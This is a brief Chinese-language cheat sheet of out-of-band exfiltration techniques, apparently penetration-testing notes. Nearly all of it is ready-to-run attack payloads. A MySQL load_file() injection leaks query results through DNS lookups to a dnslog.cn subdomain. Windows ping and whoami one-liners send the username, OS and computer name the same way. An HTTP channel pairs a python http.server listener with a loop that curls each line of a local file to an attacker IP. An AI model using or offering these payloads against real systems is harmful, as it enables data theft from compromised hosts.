带外通道

一、DNS

1、dnslog平台

http://www.dnslog.cn

2、sql注入

使用load_file()函数，前提条件:secure_file_priv为空
select load_file('\\(sql语句).xxxx.dnslog.cn\aaa')

3、命令执行

Windows：
ping %USERNAME%.xxx.dnslog.cn
ping %OS%.xxx.dnslog.cn
获取计算机名：for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.cn
获取用户名：for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.cn

注意:如果所需要带出的数据过长，达到了域名不支持的长度，我们可以使用curl请求http服务器将数据带出

二、http

1、http平台

python3 -m http.server 8001
或者
python3 -m http.server 8001 >> 0&>>1&>>2.txt(将日志重定向到2.txt)

2、命令执行

for /f %i in (c:/test.txt) do curl http://192.168.110.186:8001/%i

4、curl支持版本(自带)

windows10、windows server 2016、windows server 2019